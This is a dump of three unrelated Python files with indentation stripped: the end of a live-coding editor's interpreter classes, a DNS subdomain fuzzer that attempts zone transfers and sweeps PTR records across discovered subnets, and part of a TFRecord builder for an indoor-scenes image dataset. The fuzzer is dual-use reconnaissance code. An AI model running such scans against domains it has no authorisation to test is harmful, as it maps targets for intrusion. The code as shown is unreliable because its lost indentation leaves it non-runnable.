# TODO -- get control of f_out and stdout
self.f_out.seek(0)
message = []
for stdout_line in iter(self.f_out.readline, ""):
line = stdout_line.rstrip()
sys.stdout.write(line)
message.append(line)
# clear tmpfile
self.f_out.truncate(0)
# Send console contents to the server
if len(message) > 0 and self.client.is_master():
self.client.send(MSG_CONSOLE(self.client.id, "\n".join(message)))
time.sleep(0.05)
except ValueError as e:
print(e)
return
return
def kill(self):
""" Stops communicating with the subprocess """
# End process if not done so already
self.is_alive = False
if self.lang.poll() is None:
self.lang.communicate()
class CustomInterpreter:
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def __call__(self):
return Interpreter(*self.args, **self.kwargs)
class BuiltinInterpreter(Interpreter):
def __init__(self, client, args):
Interpreter.__init__(self, client, self.path, args)
class FoxDotInterpreter(BuiltinInterpreter):
filetype=".py"
path = "{} -u -m FoxDot --pipe".format(PYTHON_EXECUTABLE)
name = "FoxDot"
@classmethod
def setup(cls):
cls.keywords = ["Clock", "Scale", "Root", "var", "linvar", '>>', 'print']
cls.keyword_regex = compile_regex(cls.keywords)
@staticmethod
def format(string):
return "{}\n\n".format(string)
@classmethod
def find_comment(cls, string):
instring, instring_char = False, ""
for i, char in enumerate(string):
if char in ('"', "'"):
if instring:
if char == instring_char:
instring = False
instring_char = ""
else:
instring = True
instring_char = char
elif char == "#":
if not instring:
return [(i, len(string))]
return []
def kill(self):
self.evaluate(self.stop_sound())
Interpreter.kill(self)
return
@classmethod
def stop_sound(cls):
return "Clock.clear()"
class TidalInterpreter(BuiltinInterpreter):
path = 'ghci'
filetype = ".tidal"
name = "TidalCycles"
def start(self):
# Use ghc-pkg to find location of boot-tidal
try:
process = Popen(["ghc-pkg", "field", "tidal", "data-dir"], stdout=PIPE, universal_newlines=True)
output = process.communicate()[0]
data_dir = output.split("\n")[0].replace("data-dir:", "").strip()
self.boot_file = os.path.join(data_dir, "BootTidal.hs")
except FileNotFoundError:
# Set to None - might be defined in bootup file
self.boot_file = None
Interpreter.start(self)
return self
def load_bootfile(self):
"""
Overload for Tidal to use :script /path/to/file
instead of loading each line of a boot file one by
one
"""
self.boot_file = (self.get_custom_bootfile() or self.boot_file)
if self.boot_file:
self.write_stdout(":script {}".format(self.boot_file))
else:
err = "Could not find BootTidal.hs! You can specify the path in your Troop boot config file: {}".format(BOOT_CONFIG_FILE)
raise(FileNotFoundError(err))
return
@classmethod
def setup(cls):
cls.keywords = ["d{}".format(n) for n in range(1,17)] + ["\$", "#", "hush", "solo", "silence"]
cls.keyword_regex = compile_regex(cls.keywords)
return
@classmethod
def find_comment(cls, string):
instring, instring_char = False, ""
for i, char in enumerate(string):
if char in ('"', "'"):
if instring:
if char == instring_char:
instring = False
instring_char = ""
else:
instring = True
instring_char = char
elif char == "-":
if not instring and (i + 1) < len(string) and string[i + 1] == "-":
return [(i, len(string))]
return []
@staticmethod
def format(string):
""" Used to formant multiple lines in haskell """
return ":{\n"+string+"\n:}\n"
@classmethod
def stop_sound(cls):
""" Triggers the 'hush' command using Ctrl+. """
return "hush"
class StackTidalInterpreter(TidalInterpreter):
path = "stack ghci"
# Interpreters over OSC (e.g. Sonic Pi)
# -------------------------------------
class OSCInterpreter(Interpreter):
""" Class for sending messages via OSC instead of using a subprocess """
def __init__(self, *args, **kwargs):
self.re = {"tag_bold": self.find_keyword, "tag_italic": self.find_comment}
self.lang = OSC.OSCClient()
self.lang.connect((self.host, self.port))
self._osc_error = False
# Overload to not activate a server
def start(self):
return self
def kill(self):
self.evaluate(self.stop_sound())
self.lang.close()
return
def new_osc_message(self, string):
""" Overload in sub-class, return OSC.OSCMessage"""
return
def print_osc_warning_message(self):
print("Warning: No connection made to local {} OSC server instance.".format(self.__repr__()))
return
def evaluate(self, string, *args, **kwargs):
# Print to the console the message
Interpreter.print_stdin(self, string, *args, **kwargs)
# Create an osc message and send to the server
try:
self.lang.send(self.new_osc_message(string))
self._osc_error = False
except OSC.OSCClientError:
if not self._osc_error:
self.print_osc_warning_message()
self._osc_error = True
return
class SuperColliderInterpreter(OSCInterpreter):
filetype = ".scd"
host = 'localhost'
port = 57120
name = "SuperCollider"
def new_osc_message(self, string):
""" Returns OSC message for Troop Quark """
msg = OSC.OSCMessage("/troop")
msg.append([string])
return msg
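    # Example (illustrative): new_osc_message('{ SinOsc.ar(440) }.play') builds a
    # message addressed to "/troop" whose single argument is the code string,
    # which the Troop Quark listening on port 57120 evaluates.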
@classmethod
def find_comment(cls, string):
instring, instring_char = False, ""
for i, char in enumerate(string):
if char in ('"', "'"):
if instring:
if char == instring_char:
instring = False
instring_char = ""
else:
instring = True
instring_char = char
elif char == "/":
                if not instring and (i + 1) < len(string) and string[i + 1] == "/":
return [(i, len(string))]
return []
@classmethod
def get_block_of_code(cls, text, index):
""" Returns the start and end line numbers of the text to evaluate when pressing Ctrl+Return. """
# Get start and end of the buffer
start, end = "1.0", text.index("end")
lastline = int(end.split('.')[0]) + 1
        # Indices of block to execute
block = [0,0]
# 1. Get position of cursor
cur_y, cur_x = index.split(".")
cur_y, cur_x = int(cur_y), int(cur_x)
left_cur_y, left_cur_x = cur_y, cur_x
right_cur_y, right_cur_x = cur_y, cur_x
# Go back to find a left bracket
while True:
new_left_cur_y, new_left_cur_x = cls.get_left_bracket(text, left_cur_y, left_cur_x)
new_right_cur_y, new_right_cur_x = cls.get_right_bracket(text, right_cur_y, right_cur_x)
if new_left_cur_y is None or new_right_cur_y is None:
block = [left_cur_y, right_cur_y + 1]
break
else:
left_cur_y, left_cur_x = new_left_cur_y, new_left_cur_x
right_cur_y, right_cur_x = new_right_cur_y, new_right_cur_x
return block
@classmethod
def get_left_bracket(cls, text, cur_y, cur_x):
count = 0
line_text = text.get("{}.{}".format(cur_y, 0), "{}.{}".format(cur_y, "end"))
for line_num in range(cur_y, 0, -1):
# Only check line if it has text
if len(line_text) > 0:
for char_num in range(cur_x - 1, -1, -1):
try:
char = line_text[char_num]
except IndexError as e:
print("left bracket, string is {}, index is {}".format(line_text, char_num))
raise(e)
if char == ")":
count += 1
elif char == "(":
if count == 0:
return line_num, char_num
else:
count -= 1
line_text = text.get("{}.{}".format(line_num - 1, 0), "{}.{}".format(line_num - 1, "end"))
cur_x = len(line_text)
return None, None
@classmethod
def get_right_bracket(cls, text, cur_y, cur_x):
num_lines = int(text.index("end").split(".")[0]) + 1
count = 0
for line_num in range(cur_y, num_lines):
line_text = text.get("{}.{}".format(line_num, 0), "{}.{}".format(line_num, "end"))
# Only check line if it has text
if len(line_text) > 0:
for char_num in range(cur_x, len(line_text)):
try:
char = line_text[char_num]
except IndexError as e:
print("right bracket, string is {}, index is {}".format(line_text, char_num))
raise(e)
if char == "(":
count += 1
if char == ")":
if count == 0:
return line_num, char_num + 1
else:
count -= 1
cur_x = 0
else:
return None, None
@classmethod
def stop_sound(cls):
return "s.freeAll"
class SonicPiInterpreter(OSCInterpreter):
filetype = ".rb"
host = 'localhost'
port = 4557
name = "Sonic-Pi"
def new_osc_message(self, string):
""" Returns OSC message for Sonic Pi """
msg = OSC.OSCMessage("/run-code")
msg.append(["0", string])
return msg
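    # Example (illustrative): new_osc_message('play 60') sends "/run-code" with
    # arguments ["0", "play 60"] to the local Sonic Pi server on port 4557.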
@classmethod
def find_comment(cls, string):
instring, instring_char = False, ""
for i, char in enumerate(string):
if char in ('"', "'"):
if instring:
if char == instring_char:
instring = False
instring_char = ""
else:
instring = True
instring_char = char
elif char == "#":
if not instring:
return [(i, len(string))]
return []
@classmethod
def get_block_of_code(cls, text, index):
""" Returns first and last line as Sonic Pi evaluates the whole code """
start, end = "1.0", text.index("end")
return [int(index.split(".")[0]) for index in (start, end)]
@classmethod
def stop_sound(cls):
return 'osc_send({!r}, {}, "/stop-all-jobs")'.format(cls.host, cls.port)
# Set up ID system
langtypes = { FOXDOT : FoxDotInterpreter,
TIDAL : TidalInterpreter,
TIDALSTACK : StackTidalInterpreter,
SUPERCOLLIDER : SuperColliderInterpreter,
SONICPI : SonicPiInterpreter,
DUMMY : DummyInterpreter }
for lang_id, lang_cls in langtypes.items():
lang_cls.id = lang_id
|
domainfuzzer.py
|
from dnslookup import lookup
from logger import Output, col
from threading import Thread, Lock
from env import SIGINT_handler
import time, signal, math
import random, string, sys, io, re
import dns.zone
class ScanList():
def __init__(self, args):
if args.dictionary:
try:
self.unscanned = map(unicode.strip, io.open(args.dictionary, encoding='utf-8', mode='r').readlines())
except IOError as e:
print (e)
sys.exit()
else:
self.unscanned = []
self.unscanned.insert(0,'')
self.scanned = []
self.found = []
self.n_unscanned = len(self.unscanned)
self.n_scanned = len(self.scanned)
self.items = []
self.subnets = []
self.ptr_unscanned_ip = []
self.ptr_scanned = 0
self.scan_failed = []
class SubFuz():
def __init__(self, domain, config, args, PLUGINS_DIR, CORE_DIR):
self.handler = SIGINT_handler()
signal.signal(signal.SIGINT, self.handler.signal_handler)
self.log = Output(args.log_filename, args.csv_filename, args.quiet)
self.domain = domain.decode('utf-8').encode('idna')
self.throttle = args.z / 1000.0
self.threads = args.t
self.zone = args.zone
self.retry = config['config']['retry']
if args.deep: self.deep_domains = map(unicode.strip, io.open(args.deep, encoding='utf-8', mode='r').readlines())
else: self.deep_domains = config["config"]["deep_domains"]
self.timeout = args.p
if args.dns: self.dns = args.dns
else: self.dns = config['config']['dns_fallback']
if args.protocol: self.protocol = args.protocol
else: self.protocol = config['config']['dns_fallback_protocol']
if args.record: self.record = args.record
else: self.record = config['config']['dns_fallback_record']
self.args = args
self.config = config
# TODO move wildcards to ScanList
self.a_wildcard = self.aaaa_wildcard = self.txt_wildcard = self.mx_wildcard = self.cname_wildcard = []
self.sl = ScanList(args)
# Mutex lock required to avoid issues with multiple threads working on the same object.
self.mutex = Lock()
def dns_server(self):
ns_record = lookup(self.domain, 'NS', self.config['config']['dns_fallback'], self.protocol, self.timeout)
if not ns_record:
ns_record = lookup(".".join(self.domain.split('.')[-2:]), 'NS', self.config['config']['dns_fallback'], self.protocol, self.timeout)
# TODO very ugly way of doing it, https://publicsuffix.org/list/public_suffix_list.dat is on the to-do list
# currently doesn't handle target domain inputs like subdomain.domain.co.uk or similar domains very well yet.
# Grab NS record data
# rdtype 2=NS
nameservers = [x for x in ns_record if x.rdtype == 2]
dns_servers = []
self.log.normal('Name Servers:', True)
if nameservers:
# For every NS record found
for y in nameservers[0]:
dns_server_name = y.target.to_text()
# get DNS server IP
dns_server = lookup(dns_server_name,'A', self.config['config']['dns_fallback'], self.protocol, self.timeout)[0].items[0].to_text()
# Zone transfer
if self.zone:
try:
z = dns.zone.from_xfr(dns.query.xfr(dns_server, self.domain, timeout=10, lifetime=10))
self.log.good('{:40}'.format(dns_server_name) + '{:15}'.format(dns_server) + ' - Zone Transfer allowed.', True)
names = z.nodes.keys()
for n in names:
self.log.normal(z[n].to_text(n), True)
except:
self.log.warn('{:40}'.format(dns_server_name) + '{:15}'.format(dns_server) + ' - Zone Transfer not allowed.', True)
else:
self.log.neutral('{:40}'.format(dns_server_name) + '{:15}'.format(dns_server), True)
# Testing for open TCP and UDP ports for DNS servers, and what type of records are permitted.
# TCP
tans = lookup(self.domain, 'ANY', dns_server, 'TCP', self.timeout)
if tans:
if [x for x in tans if x.rdtype == 1 or x.rdtype == 28 or x.rdtype == 5 or x.rdtype == 15 or x.rdtype == 16]:
dns_servers.append(['TCP', dns_server, 'ANY'])
else:
dns_servers.append(['TCP', dns_server, 'A'])
# UDP
uans = lookup(self.domain, 'ANY', dns_server, 'UDP', self.timeout)
if uans:
if [x for x in uans if x.rdtype == 1 or x.rdtype == 28 or x.rdtype == 5 or x.rdtype == 15 or x.rdtype == 16]:
dns_servers.append(['UDP', dns_server, 'ANY'])
else:
dns_servers.append(['UDP', dns_server, 'A'])
# pick the best type of nameserver and record combination
if not self.args.dns and dns_servers:
a = [i for i in dns_servers if i[0] == 'UDP' and i[2] == 'ANY']
b = [i for i in dns_servers if i[0] == 'TCP' and i[2] == 'ANY']
c = [i for i in dns_servers if i[0] == 'UDP' and i[2] == 'A']
d = [i for i in dns_servers if i[0] == 'TCP' and i[2] == 'A']
if a: # ANY + UDP
self.dns, self.protocol, self.record = a[0][1], a[0][0], a[0][2]
elif b: # ANY + TCP
self.dns, self.protocol, self.record= b[0][1], b[0][0], b[0][2]
elif c: # A + UDP
self.dns, self.protocol, self.record = c[0][1], c[0][0], c[0][2]
elif d: # A + TCP
self.dns, self.protocol, self.record = d[0][1], d[0][0], d[0][2]
override_dns = self.args.dns
override_record = self.args.record
override_protocol = self.args.protocol
if override_record: self.record = override_record
if override_dns: self.dns = override_dns
if override_protocol: self.protocol = override_protocol
self.log.neutral('Using nameserver %s, query type %s over %s' % (self.dns, self.record, self.protocol), True)
def check_wildcard(self, domain_addr):
try:
wildcard = ''.join(random.choice(string.ascii_lowercase) for _ in range(15))
ans = lookup( (wildcard + '.' + domain_addr.encode('utf-8')), self.record, self.dns, self.protocol, self.timeout)
if ans:
wc = False
d = domain_addr.encode('utf-8')
for r in ans:
if r.rdtype == 1: # A RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.a_wildcard += item
self.log.warn('{:40}'.format("Wildcard A record found for %s: " % d) + ", ".join(item), True)
wc = True
if r.rdtype == 5: # CNAME RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.cname_wildcard += item
self.log.warn('{:40}'.format("Wildcard CNAME record found for %s: " % d) + ", ".join(item), True)
wc = True
if r.rdtype == 16: # TXT RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.txt_wildcard += item
self.log.warn('{:40}'.format("Wildcard TXT record found for %s: " % d) + ", ".join(item), True)
wc = True
if r.rdtype == 28: # AAAA RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.aaaa_wildcard += item
self.log.warn('{:40}'.format("Wildcard AAAA record found for %s: " % d) + ", ".join(item), True)
wc = True
if r.rdtype == 15: # MX RECORD
item = []
for x in r.items:
item.append(x.to_text())
self.mx_wildcard += item
self.log.warn('{:40}'.format("Wildcard MX record found for %s: " % d) + ", ".join(item), True)
wc = True
if wc == True: return True
#if not wc:
# return False
except Exception as e:
self.log.fatal(('Wildcard check on %s.' % domain_addr), False)
print (e)
return False
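    # A wildcard entry (e.g. *.example.com) would make every fuzzed name resolve;
    # the record values collected above let parse_record() discard those hits.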
def execute_plugins(self, plugins):
for name, value in self.args._get_kwargs():
for plugin in plugins:
                if (value is True or self.args.all) and name == plugin.NAME:
try:
plugin_conf = self.config['plugins'][plugin.NAME]
self.log.good('Executing plugin: %s' % name, True)
subdomains = plugin.execute(self.domain, plugin_conf)
if subdomains:
for d in subdomains:
self.new_targets(d.lower())
except Exception as e:
self.log.fatal(str(e), True)
# TODO: domains causes output clutter that is wildcard related.
def scan(self):
self.log.normal('\n\n{:40}'.format('Domain Name') + '{:8}'.format('Record') + 'Value', True)
self.log.normal('------------------------------------------------------', True)
threads = []
for i in range(self.threads):
t = Thread(target=self.scan_worker)
threads.append(t)
t.start()
while any(t.is_alive() for t in threads):
if sys.stdout.isatty() and not self.args.quiet:
self.log.printer()
total = self.sl.n_unscanned + self.sl.n_scanned
percentage = math.ceil(self.sl.n_scanned+0.0)/total*100
sys.stdout.write("Status: " + col.cyan + "%d/%d " %(self.sl.n_scanned, total) + col.end + "domains tested. "
+ col.brown + "%.2f%%" % percentage + col.end + " done. failed: " + col.red +"%d" %
len([x for x in self.sl.scan_failed if x[1] == self.retry]) + col.end + " \r")
sys.stdout.flush()
time.sleep(0.05)
self.log.printer()
if not self.args.quiet: sys.stdout.write(' ' * 64 + '\n')
return
def append_target(self, subdomain):
try:
if subdomain not in self.sl.scanned and subdomain not in self.sl.unscanned:
self.sl.unscanned.insert(0,subdomain)
self.sl.n_unscanned += 1
except Exception as e:
self.log.fatal(('Inserting target %s.' % subdomain), False)
            print (e)
def new_targets(self, new_domain):
if not self.domain == new_domain.rstrip('.') and self.domain in new_domain:
if not self.check_wildcard(new_domain):
try:
self.mutex.acquire()
subdomain = new_domain.split('.')[0].rstrip('0123456789')
self.append_target(subdomain) # this is here for adding new targets found from plugins
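                    # Fan out (illustrative): a hit on "mail" also queues
                    # "mail00".."mail20", "mail0".."mail20" and each deep domain
                    # such as "dev.mail".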
for d in reversed(range(0, 21)):
self.append_target('%s%02d' % (subdomain, d))
self.append_target('%s%d' % (subdomain, d))
for s in self.deep_domains:
self.append_target(s + '.' + subdomain)
except Exception as e:
self.log.fatal(('Adding new target %s, %s' % (new_domain, subdomain)), False)
print (e)
finally:
self.mutex.release()
def parse_record(self, ans, query):
wildcard = False
try:
for r in ans:
if r.rdtype == 1: # A RECORD
d = r.name.to_text().rstrip('.').decode('idna').encode('utf-8')
for x in r.items:
item = x.to_text()
if item in self.a_wildcard:
wildcard = True
else:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('A') + '{:10}'.format(item))
self.log.csv_queue.append("%s,A,%s" % (d, item))
if r.rdtype == 5: # CNAME RECORD
d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if item in self.cname_wildcard:
wildcard = True
else:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('CNAME') + '{:10}'.format(item.rstrip('.')))
self.log.csv_queue.append("%s,CNAME,%s" % (d, item.rstrip('.')))
if r.rdtype == 12: # PTR RECORD
#d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if self.domain.split('.')[-2] in item:
if not [y for y in self.sl.items if item.rstrip('.') in y if query in y[1]]:
self.sl.items.append([item, query])
self.log.log_queue.append('{:40}'.format(item.rstrip('.')) + '{:8}'.format('PTR') + '{:10}'.format(query))
self.log.csv_queue.append("%s,PTR,%s" % (item.rstrip('.'), query))
else:
wildcard = True
if r.rdtype == 16: # TXT RECORD
d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if item in self.txt_wildcard:
wildcard = True
else:
if [t for t in self.config['config']['txt_record_search'] if t in item]:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('TXT') + '{:10}'.format(item))
self.log.csv_queue.append("%s,TXT,%s" % (d, item))
if r.rdtype == 28: # AAAA RECORD
d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if item in self.aaaa_wildcard:
wildcard = True
else:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('AAAA') + '{:10}'.format(item))
self.log.csv_queue.append("%s,AAAA,%s" % (d, item))
if r.rdtype == 15: # MX RECORD
d = r.name.to_text().rstrip('.').decode('utf-8').decode('idna')
for x in r.items:
item = x.to_text()
if item in self.mx_wildcard:
wildcard = True
else:
self.sl.items.append([d, item])
self.log.log_queue.append('{:40}'.format(d) + '{:8}'.format('MX') + '{:10}'.format(item.split(' ')[1].rstrip('.')))
self.log.csv_queue.append("%s,MX,%s" % (d, item.split(' ')[1].rstrip('.')))
new = ['mail._domainkey', '_dmarc', 'default._domainkey']
for n in new:
if d == self.domain:
self.append_target(n)
else:
self.append_target(n + '.' + d.replace(self.domain, '').strip('.'))
except Exception as e:
self.log.fatal(('Parsing records for: %s with answer %s' % (query, ans)), False)
print (e)
return wildcard
def scan_worker(self):
while True:
if self.handler.SIGINT:
return
self.mutex.acquire()
try:
                if self.record == 'PTR':
tests = ['PTR']
self.sl.ptr_scanned += 1
subdomain = self.sl.ptr_unscanned_ip.pop(0)
else:
if self.args.record: tests = [self.record]
                    elif self.record == 'A': tests = ['A', 'TXT', 'MX']
else: tests = ['ANY']
self.sl.n_scanned += 1
self.sl.n_unscanned -= 1
subdomain = self.sl.unscanned.pop(0)
except:
                if len(self.sl.unscanned) == 0:
return
finally:
self.mutex.release()
time.sleep(self.throttle)
# if domain already has been scanned (remove duplicates)
# else, add domain to "scanned" list.
if subdomain in self.sl.scanned:
continue
else:
self.sl.scanned.append(subdomain)
for t in tests:
                if self.record == 'PTR':
d = subdomain
else:
d = (subdomain + u'.' + self.domain).lower().lstrip('.')
try:
ans = lookup(d.encode('utf-8'), t, self.dns, self.protocol, self.timeout)
if ans:
wildcard = self.parse_record(ans, d)
                    if ans and not wildcard and d != self.domain and self.record != 'PTR':
self.new_targets(d)
self.sl.found.append(d)
                    elif ans == False and self.record != 'PTR':
hit = [x for x in self.sl.scan_failed if x[0] == subdomain]
if hit:
z = self.sl.scan_failed.index(hit[0])
self.sl.scan_failed[z][1] += 1
if hit[0][1] > self.retry:
continue
else:
self.sl.scan_failed.append([subdomain, 1])
self.sl.unscanned.insert(0,subdomain)
except Exception as e:
try:
self.log.fatal(('Domain Query failed on %s.' % d), False)
except:
self.log.fatal(('Domain Query failed on %s. (HEX ENCODED)' % d.encode('hex')), False)
# added to in an attempt to resolve a bug related to invalid UTF-8 characters
print (e)
def subnets(self):
# Parse through results and check for similar IP's and assign them to "subnets"
# TODO: For god's sake, I'm hardly able to understand this myself.
for z in self.sl.items:
if re.search("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$", z[1]):
ip = ".".join([z[1].split('.')[i] for i in [0, 1, 2]]) + '.0-255'
hit = [x for x in self.sl.subnets if x[0] == ip]
if hit:
z = self.sl.subnets.index(hit[0])
self.sl.subnets[z][1] += 1
else:
self.sl.subnets.append([ip, 1])
self.sl.subnets.sort()
def ptr_scan(self):
while self.sl.subnets:
subnet = self.sl.subnets.pop(0)
subnet = subnet[0][:subnet[0].rfind('.') + 1]
for i in range(0, 256):
self.sl.ptr_unscanned_ip.append(subnet + str(i))
n_ip = len(self.sl.ptr_unscanned_ip)
if self.args.ptr and n_ip > 0:
self.log.good('Checking PTR records for related subnets', False)
self.record = 'PTR'
threads = []
for i in range(self.threads):
t = Thread(target=self.scan_worker)
threads.append(t)
t.start()
while any(t.is_alive() for t in threads):
if sys.stdout.isatty() and not self.args.quiet:
self.log.printer()
percentage = math.ceil(self.sl.ptr_scanned + 0.0)/n_ip*100
sys.stdout.write("Status: " + col.cyan + "%d/%d " % (self.sl.ptr_scanned, n_ip) + col.end + "IP's tested."
+ col.brown + " %.2f%%" % percentage + col.end + " done. \r")
sys.stdout.flush()
time.sleep(0.05)
# just to ensure everything is out
self.log.printer()
if not self.args.quiet: sys.stdout.write(' ' * 64 + '\n')
def stats(self):
if self.sl.ptr_scanned == 0:
self.log.warn('No PTR records found for %s.' % self.domain, False)
        self.log.normal('\n\nA total of %d domain records were found.' % len(self.sl.items), True)
self.subnets()
if self.sl.subnets:
self.log.normal('IP range detected:', True)
for x in self.sl.subnets:
self.log.normal(' %s - %d hits' % (x[0], x[1]), True)
else:
self.log.normal("No subnets was discovered.", True)
if not self.args.quiet: print ("\nDONE")
def close(self):
del(self.log)
def __exit__(self):
self.close()
def __del__(self):
self.close()
|
create_indoors.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_integer('train_shards', 12,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('test_shards', 4,
'Number of shards in test TFRecord files.')
tf.app.flags.DEFINE_string('output_directory', './tfRecords-Indoors-2/',
'Output data directory')
tf.app.flags.DEFINE_integer('num_threads', 4,
'Number of threads to preprocess the images.')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(image_buffer, trainid, filename):
"""Build an Example proto for an example.
  Args:
    image_buffer: string, JPEG encoding of the RGB image
    trainid: integer, identifier for the ground truth class of the image
    filename: string, path to the image file, e.g., '/path/to/example.JPG'
  Returns:
    Example proto
  """
example = tf.train.Example(features=tf.train.Features(feature={
'image/class/trainid': _int64_feature(trainid),
'image/encoded': _bytes_feature(image_buffer),
'image/filename': _bytes_feature(filename)
}))
return example
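# Illustrative usage (mirrors _process_image_files_batch below): the serialized
# proto is what gets written to a shard, e.g.
#   writer.write(_convert_to_example(image_buffer, label, filename).SerializeToString())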
def _is2convert(filename):
blacklist = ['laundromat/Laundry_Room.bmp',
'waitingroom/Bistro_3.BMP',
'kindergarden/classroom_north.bmp',
'gym/Gym1.png',
'winecellar/wine_cellar_floor_stone.gif',
'laundromat/Laundry_Room.bmp',
'computerroom/url.gif',
'poolinside/indooPool_Inside.gif',
'library/scotland_library2.png',
'fastfood_restaurant/panther_grill.gif',
'closet/closet_design_lg.gif',
'waitingroom/Bistro_3.BMP',
'gym/Gym2.png',
'nursery/idkidsc0301.png',
'kindergarden/classroom_north.bmp',
'fastfood_restaurant/subway.gif',
'garage/salmon_garage_after.gif',
'waitingroom/deco5.png',
'shoeshop/marky.png',
'buffet/Buffet_Lettuce.gif',
'fastfood_restaurant/melvados.gif',
'computerroom/aula_informatica.gif',
'buffet/Buffet_Set_Up.gif',
'meeting_room/conferencerm2.gif',
'kindergarden/ClassroomLarge.gif',
'fastfood_restaurant/connies.gif',
'greenhouse/1412_mb_file_0a8c5.gif',
'buffet/Buffet_Set_Up_2.gif',
'casino/casino_0338.jpg',
'casino/casino_0336.jpg']
return filename.split('Images/')[-1] in blacklist
class ImageCoder(object):
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that decodes RGB JPEG data.
self._raw_data = tf.placeholder(dtype=tf.string)
self._image_data = tf.image.decode_image(self._raw_data, channels=3)
self._image_data = tf.squeeze(self._image_data) # gif will be [1, height, width, channels]
self._encoded_data = tf.image.encode_jpeg(self._image_data, format='rgb', quality=100)
def re_encode_jpeg(self, image_data):
# since tf1.2, decode_jpeg can decode JPEGs, PNGs, BMPs and non-animated GIFs; so for compatibility,
# re-encoding all of three to jpegs for version < 1.2.
return self._sess.run(self._encoded_data,
feed_dict={self._raw_data: image_data})
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
  with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
if _is2convert(filename):
print('Reencoding to JPEG for %s' % filename)
image_data = coder.re_encode_jpeg(image_data)
return image_data
def _process_image_files_batch(coder, thread_index, ranges, name, filenames, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch index within [0, len(ranges)).
    ranges: list of pairs of integers specifying the range of filenames each
      batch analyzes in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards // num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
image_buffer = _process_image(filename, coder)
example = _convert_to_example(image_buffer, label, filename)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, data_sub):
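  # Builds shuffled, parallel lists of image paths and integer class labels from
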